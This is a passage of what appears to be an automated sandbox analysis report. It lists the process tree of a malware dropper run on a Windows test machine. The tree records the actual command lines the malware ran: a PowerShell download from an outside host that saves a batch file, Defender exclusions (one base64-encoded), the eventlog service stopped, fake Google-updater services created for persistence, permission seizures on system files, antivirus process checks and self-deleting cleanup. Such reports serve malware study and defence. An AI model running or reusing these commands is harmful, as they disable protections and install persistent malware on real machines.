      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1984
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7248
- C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  PID:6380
- - C:\Windows\sysblardsv.exe
    C:\Windows\sysblardsv.exe
    3⤵
    - Modifies security service
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    PID:5312
  - - C:\Users\Admin\AppData\Local\Temp\767226468.exe
      C:\Users\Admin\AppData\Local\Temp\767226468.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      PID:4488
    - - C:\Windows\syslmgrsvc.exe
        
        C:\Windows\syslmgrsvc.exe
        5⤵
        Executes dropped EXE
        
        PID:4816
      - C:\Users\Admin\AppData\Local\Temp\240536066.exe
        
        C:\Users\Admin\AppData\Local\Temp\240536066.exe
        6⤵
        
        PID:280
      - C:\Users\Admin\AppData\Local\Temp\1632030773.exe
        
        C:\Users\Admin\AppData\Local\Temp\1632030773.exe
        6⤵
        
        PID:6464
      - C:\Users\Admin\AppData\Local\Temp\3031322510.exe
        
        C:\Users\Admin\AppData\Local\Temp\3031322510.exe
        6⤵
        
        PID:888
      - C:\Users\Admin\AppData\Local\Temp\1699713940.exe
        
        C:\Users\Admin\AppData\Local\Temp\1699713940.exe
        6⤵
        
        PID:5144
      - C:\Users\Admin\AppData\Local\Temp\283765726.exe
        
        C:\Users\Admin\AppData\Local\Temp\283765726.exe
        6⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\1773630283.exe
        
        C:\Users\Admin\AppData\Local\Temp\1773630283.exe
        6⤵
        
        PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\3009318456.exe
      C:\Users\Admin\AppData\Local\Temp\3009318456.exe
      4⤵
      PID:6020
    - - C:\Windows\winqlsdrvcs.exe
        
        C:\Windows\winqlsdrvcs.exe
        5⤵
        
        PID:7784
      - C:\Users\Admin\AppData\Local\Temp\1530232592.exe
        
        C:\Users\Admin\AppData\Local\Temp\1530232592.exe
        6⤵
        
        PID:5672
      - C:\Users\Admin\AppData\Local\Temp\1302724224.exe
        
        C:\Users\Admin\AppData\Local\Temp\1302724224.exe
        6⤵
        
        PID:4932
      - C:\Users\Admin\AppData\Local\Temp\2150015860.exe
        
        C:\Users\Admin\AppData\Local\Temp\2150015860.exe
        6⤵
        
        PID:6164
  - - C:\Users\Admin\AppData\Local\Temp\579810092.exe
      C:\Users\Admin\AppData\Local\Temp\579810092.exe
      4⤵
      PID:3252
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
        5⤵
        
        PID:6288
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
        5⤵
        
        PID:5508
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
        5⤵
        
        PID:4112
  - - C:\Users\Admin\AppData\Local\Temp\115941369.exe
      C:\Users\Admin\AppData\Local\Temp\115941369.exe
      4⤵
      PID:6656
    - - C:\Users\Admin\AppData\Local\Temp\1382227689.exe
        
        C:\Users\Admin\AppData\Local\Temp\1382227689.exe
        5⤵
        
        PID:6296
  - - C:\Users\Admin\AppData\Local\Temp\2558825873.exe
      C:\Users\Admin\AppData\Local\Temp\2558825873.exe
      4⤵
      PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\1785517813.exe
      C:\Users\Admin\AppData\Local\Temp\1785517813.exe
      4⤵
      PID:7988
- C:\Users\Admin\AppData\Local\Temp\a\print.exe
  "C:\Users\Admin\AppData\Local\Temp\a\print.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3352
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:4640
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:6728
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:7064
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:7504
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:8040
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2692
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:7056
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:2120
- C:\Users\Admin\AppData\Local\Temp\a\222.exe
  "C:\Users\Admin\AppData\Local\Temp\a\222.exe"
  2⤵
  - Executes dropped EXE
  PID:2220
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    - Loads dropped DLL
    PID:2756
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:2176
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p209313910271864811381312692 -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3076
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_8.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_7.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3816
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_6.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4124
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_5.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4324
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_4.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4660
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_3.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:5284
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:5700
  - - C:\Windows\system32\attrib.exe
      attrib +H "Installer.exe"
      4⤵
      Views/modifies file attributes
      PID:2764
  - - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
      "Installer.exe"
      4⤵
      Executes dropped EXE
      PID:6584
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6524
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:6956
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        
        PID:6592
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        
        PID:6252
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        
        PID:6228
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        
        PID:6404
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OARKQOLE"
        5⤵
        Launches sc.exe
        
        PID:6660
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:7084
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:7324
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OARKQOLE"
        5⤵
        Launches sc.exe
        
        PID:7288
- C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"
  2⤵
  - Executes dropped EXE
  PID:8600
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"
    3⤵
    PID:1108
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "
      4⤵
      Drops file in System32 directory
      PID:4340
    - - C:\Windows\system32\reg.exe
        
        C:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
        5⤵
        
        PID:4876
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "Windows 7"
        5⤵
        
        PID:4948
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Users\Admin\AppData\Local\Temp /r /d y
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5080
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Users\Admin\AppData\Local\Temp /t /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7312
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\slwga.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:6412
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\slwga.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6516
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\sppwmi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:6832
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\sppwmi.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7488
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\systemcpl.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\systemcpl.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7924
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\user32.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:8140
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\user32.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:700
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\winlogon.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1072
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\winlogon.exe /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8296
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\winver.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8468
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\winver.exe /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8584
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\sppcomapi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8704
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\sppcomapi.dll /deny users:(X)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8888
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\sppsvc.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8964
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\sppsvc.exe /deny "LOCAL SERVICE":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9092
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\winlogon.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9212
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\winlogon.exe /deny "LOCAL SERVICE":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1160
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\slwga.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3820
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\slwga.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4068
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\sppwmi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5144
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\sppwmi.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2720
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\systemcpl.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1540
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\systemcpl.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2540
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\user32.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5688
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\user32.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5848
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\winver.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6136
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\winver.exe /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2420
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\sppcomapi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6296
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\sppcomapi.dll /deny users:(X)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6444
    - - C:\Windows\system32\regedt32.exe
        
        C:\Windows\Sysnative\regedt32.exe /s MuiCache.reg
        5⤵
        
        PID:3140
      - C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s MuiCache.reg
        6⤵
        Modifies data under HKEY_USERS
        Modifies registry class
        Runs .reg file with regedit
        
        PID:3188
    - - C:\Windows\system32\control.exe
        
        C:\Windows\Sysnative\control.exe /name Microsoft.System
        5⤵
        Modifies registry class
        
        PID:7040
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 7
        5⤵
        Runs ping.exe
        
        PID:7948
    - - C:\Windows\system32\regedt32.exe
        
        C:\Windows\Sysnative\regedt32.exe /s ShowCmd.reg
        5⤵
        
        PID:2696
      - C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s ShowCmd.reg
        6⤵
        Modifies registry class
        Runs .reg file with regedit
        
        PID:5216
- C:\Users\Admin\AppData\Local\Temp\a\client.exe
  "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:4180
- - C:\Windows\system32\Client.exe
    "C:\Windows\system32\Client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4604
- C:\Users\Admin\AppData\Local\Temp\a\reverse.exe
  "C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"
  2⤵
  - Executes dropped EXE
  PID:4412
- C:\Users\Admin\AppData\Local\Temp\a\64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\64.exe"
  2⤵
  - Executes dropped EXE
  PID:3652
- - C:\Windows\system32\cmd.exe
    cmd
    3⤵
    PID:4880
- C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fd1.exe"
  2⤵
  PID:2496
- - C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
    C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
    3⤵
    PID:3000
- C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
  "C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe"
  2⤵
  PID:7268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYQBcAG0AcwBmAGkAbABlAHIALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAG0AcwBmAGkAbABlAHIALgBlAHgAZQA7AA==
    3⤵
    PID:7796
- - C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
    C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
    3⤵
    PID:7928
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msfiler.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7752
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mdnsresp.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3180
- C:\Users\Admin\AppData\Local\Temp\a\msmng2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\msmng2.exe"
  2⤵
  PID:3512
- C:\Users\Admin\AppData\Local\Temp\a\test.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
  2⤵
  PID:4828
- C:\Users\Admin\AppData\Local\Temp\a\cmd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cmd.exe"
  2⤵
  PID:3892
- C:\Users\Admin\AppData\Local\Temp\a\cmt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cmt.exe"
  2⤵
  PID:4036
- C:\Users\Admin\AppData\Local\Temp\a\findlawthose.exe
  "C:\Users\Admin\AppData\Local\Temp\a\findlawthose.exe"
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Bullet Bullet.cmd & Bullet.cmd & exit
    3⤵
    PID:6688
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:4732
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:4544
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7032
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:2732
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 335903
      4⤵
      PID:7660
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "EFFICIENCYORLANDOOUTCOMESONS" Yours
      4⤵
      PID:9176
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Interface + Hacker + Accessory + Materials + Fox 335903\P
      4⤵
      PID:7248
  - - C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\335903\Joint.pif
      335903\Joint.pif 335903\P
      4⤵
      PID:1636
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 5 127.0.0.1
      4⤵
      Runs ping.exe
      PID:2364
- C:\Users\Admin\AppData\Local\Temp\a\pub11.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pub11.exe"
  2⤵
  PID:9096
- C:\Users\Admin\AppData\Local\Temp\a\888.exe
  "C:\Users\Admin\AppData\Local\Temp\a\888.exe"
  2⤵
  PID:7208
- - C:\Users\Admin\AppData\Local\Temp\a\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:1108
- C:\Users\Admin\AppData\Local\Temp\a\univ.exe
  "C:\Users\Admin\AppData\Local\Temp\a\univ.exe"
  2⤵
  PID:7008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "univ.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\univ.exe" & exit
    3⤵
    PID:8688
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "univ.exe" /f
      4⤵
      Kills process with taskkill
      PID:8888
- C:\Users\Admin\AppData\Local\Temp\a\nine.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nine.exe"
  2⤵
  PID:8376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8376 -s 156
    3⤵
    - Program crash
    PID:5904
- C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
  2⤵
  PID:2900
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskhostw" /tr "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4996
- C:\Users\Admin\AppData\Local\Temp\a\my.exe
  "C:\Users\Admin\AppData\Local\Temp\a\my.exe"
  2⤵
  PID:4008
- C:\Users\Admin\AppData\Local\Temp\a\yar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\yar.exe"
  2⤵
  PID:3288
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"
    3⤵
    - Creates scheduled task(s)
    PID:7384
- C:\Users\Admin\AppData\Local\Temp\a\DbVisualizer_Pro.exe
  "C:\Users\Admin\AppData\Local\Temp\a\DbVisualizer_Pro.exe"
  2⤵
  PID:4064
- C:\Users\Admin\AppData\Local\Temp\a\leadiadequatepro.exe
  "C:\Users\Admin\AppData\Local\Temp\a\leadiadequatepro.exe"
  2⤵
  PID:2696

C:\Program Files\Windows Media Player\wmpnetwk.exe
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
1⤵
- Executes dropped EXE
PID:2700

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7132
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4968
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:5036
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:5168
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:5224
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5308
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:7428

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:7384

C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
1⤵
PID:4804
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:7968
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:8368
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:8068
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:6636
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:6560
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:6620
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6292
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:7620

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:6368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
